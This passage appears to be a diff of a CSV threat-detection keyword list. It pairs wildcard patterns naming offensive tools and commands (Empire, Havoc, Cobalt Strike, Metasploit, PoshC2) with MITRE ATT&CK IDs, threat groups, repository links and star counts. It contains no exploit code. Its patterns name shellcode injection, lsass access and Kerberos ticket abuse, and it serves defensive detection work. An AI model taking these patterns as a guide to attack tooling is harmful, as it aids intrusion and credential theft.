Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Injection* -ProcName lsass*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Injection\Spawn32*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Injection\Spawn64*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - 
T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*Injection-Exploit-1.0-SNAPSHOT-all.jar*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" +"*Injections/Traversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Injections/XSS.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*Inject-LocalShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*InjectMate.py*","offensive_tool_keyword","burpsuite","Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. 
and more).","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*InjectMateCommunity.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*Injector.exe*","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","242","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" -"*injector.ps1*.kirbi*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*injector.ps1*.kirbi*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*InjectPERemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectPEWMIFSRemote*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectProc*","offensive_tool_keyword","InjectProc","Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.There are several techniques. which are commonly used: DLL injection. process replacement (a.k.a process hollowing). hook injection and APC injection.","T1055 - T1055.012 - T1055.001 - T1055.003","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secrary/InjectProc","1","0","N/A","N/A","10","981","225","2019-02-10T11:05:15Z","2017-05-26T08:08:20Z" "*injectremote.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" -"*Inject-RemoteShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - 
Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*inject-shellcode *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Inject-RemoteShellcode*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*inject-shellcode *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
"*injectShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*InjectShellcode*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*InjectShellCode.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectShellCodeRemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectShellCodeWMIFSB64*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*injectsu.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*injectsu.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*inline_assembly -Assembly *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*inlineAssembly*/execmethod*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" "*inlineDll*/dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" -"*inline-exec.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*inline-execute *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*inline-execute *.o*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*inline-exec.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 
6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*inline-execute *","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*inline-execute *.o*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*inline-execute *tokenprivileges.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that 
detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*inline-execute StartWebClientSvc.x64.o*","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","349","45","2022-04-30T19:02:06Z","2022-04-30T10:05:02Z" "*inline-execute*whereami.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" 
